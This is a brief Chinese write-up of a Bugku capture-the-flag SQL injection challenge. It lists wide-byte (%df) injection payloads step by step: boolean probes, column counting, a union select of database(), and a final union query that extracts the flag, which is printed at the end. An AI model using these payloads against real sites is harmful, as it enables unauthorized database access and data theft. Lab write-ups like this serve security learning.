bugku ctf sql注入 (宽字节注入毫无压力)
看一下这么一道题,分支比较低。
先进去看一下
让我们查询 id=1 的 string 字段
那就、先给他加上 ?id=1
发现还是这个界面 呀
那如果换为 id=2 看一下结果
下面会 变成 空白的 ~~~~~~
那就只好用 ?id=1 这个了
正常注入
/?id=1'
/?id=1'and 1=1%23
/?id=1'and 1=2%23
发现都没有反应 ,,
只好尝试 宽字节注入
输入
/?id=1%df'
出现错误 那么 应该就是 宽字节注入了
验证一下
当
/?id=1%df' and 1=1%23 时
正确
当
/?id=1%df' and 1=2%23 时
错误
确定就是宽字节注入
然后看一下有没有显示位
先查一下有几列
/?id=1%df' order by 2%23 正确
/?id=1%df' order by 3%23 错误 说明有2列
看显示位
/?id=1%df' order by 2%23
正好分别是 id 和 key
那再查一下 database
/?id=1%df' and 1=2 union select 1,database()%23
发现数据库 名 为 sql5
这下就好办了
题目要求 查询 key表 id=1 的string字段 内容
直接 构造 语句
/?id=1%df' and 1=2 union select 1, string from sql5.key where id=1%23
发现 flag
54f3320dc261f313ba712eb3f13a1f6d |